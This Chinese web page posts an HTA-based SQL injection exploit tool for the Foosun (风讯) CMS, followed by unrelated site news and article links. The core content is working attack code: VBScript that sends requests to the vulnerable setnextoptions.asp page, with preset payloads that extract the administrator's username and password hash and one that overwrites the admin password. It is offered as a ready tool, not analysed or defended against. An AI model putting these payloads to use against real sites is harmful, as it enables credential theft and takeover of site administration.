风讯注入exp实例代码,hta版的方便使用
<SCRIPT LANGUAGE="VBScript">
Sub Window_onLoad
window.resizeTo 450,380
window.moveTo 300, 300
End Sub 
</SCRIPT>

<SCRIPT LANGUAGE="VBScript">
Function getHTTPPage(Path)
 t = GetBody(Path)
 getHTTPPage = BytesToBstr(t, "GB2312")
document.getElementById("url").innerText=getHTTPPage
End Function
</script>
<SCRIPT LANGUAGE="VBScript">
Function GetBody(url)
On Error Resume Next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
 GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function

Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
 objstream.Type = 1
 objstream.Mode = 3
 objstream.Open
 objstream.Write Body
 objstream.Position = 0
 objstream.Type = 2
 objstream.Charset = Cset
 BytesToBstr = objstream.ReadText
 objstream.Close
Set objstream = Nothing
End Function

</script>

<title>by lcx</title>
<input id="urlcode" NAME="urlcode" size="60" value="http://风讯url/user/setnextoptions.asp">
<select id="sql" name="sql" onchange=vbs:getHTTPPage(document.getElementById("urlcode").value+document.getElementById("sql").value)>
<option value="">风讯sql版注入,至于其它备份shell的语句懒得写了</option>
<option value="?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=1--")">暴管理员密码</option>
<option value="?EquValue=1&ReqSql=select%201,Admin_Name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=1--")">暴管理员用户名</option>
<option value="?EquValue=1&ReqSql=select user;update FS_MF_ADMIN set ADMIN_pass_word='a0b923820dcc509a' where id=1--">更改管理员密码为1</option>
</select>
<TEXTAREA id="url" NAME="url" ROWS="8" COLS="60"></TEXTAREA>
最新资讯
“iPhone 12”延续iPhone 11的设计,但更高更薄

“iPhone 12”延续iPh

据外媒报道,近日有传闻显示,苹果公司的2020年新款iPhone
腾讯取消节后逗利是活动:马化腾今年不当面发红包

腾讯取消节后逗利是活

据腾讯公司旗下微信公众号腾讯行政消息,腾讯取消了初八
2019年AMOLED面板出货量京东方全球第二

2019年AMOLED面板出货

显示及半导体行业第三方机构CINNO Research发布的报告
SK电讯计划上半年推出全球首个5G SA服务

SK电讯计划上半年推出

SK电讯(SK Telecom)周一宣布,它已经成功地在其多供应商商
直播带货成“后浪” 第一批电商网红已在沙滩上?

直播带货成“后浪”

如果还同几年前一样,仅靠光鲜亮丽的人设和修好的图片就
多家旅游平台及航司针对疫情推出保障措施

多家旅游平台及航司针

针对此次疫情,国内各大旅游平台及多家航司推出了相关保
最新文章
HTA编辑HOST文件的脚本

HTA编辑HOST文件的脚

一个修改HOST文件的小工具,利用FSO实现,代码比较长,功能
学习正则帮手笨狼正则练习器

学习正则帮手笨狼正则

把下面的文件保存为hta文件,运行即可
hta实现的笨狼XSLT练习器

hta实现的笨狼XSLT练

学习XSLT的朋友,用这个小工具不错
hta实现的定时关机小程序

hta实现的定时关机小

这个小程序使用hta写的,用了vbscript代码实现,喜欢的朋
用来通知论坛有新贴子的hta代码

用来通知论坛有新贴子

做了个用来通知论坛有新贴子的hta把下面的代码copy到
用vbs如何确定在 HTA 中选择了哪些文本?

用vbs如何确定在 HTA

问:您好,脚本专家!如何确定在HTA中选择了哪些文本?--DO答: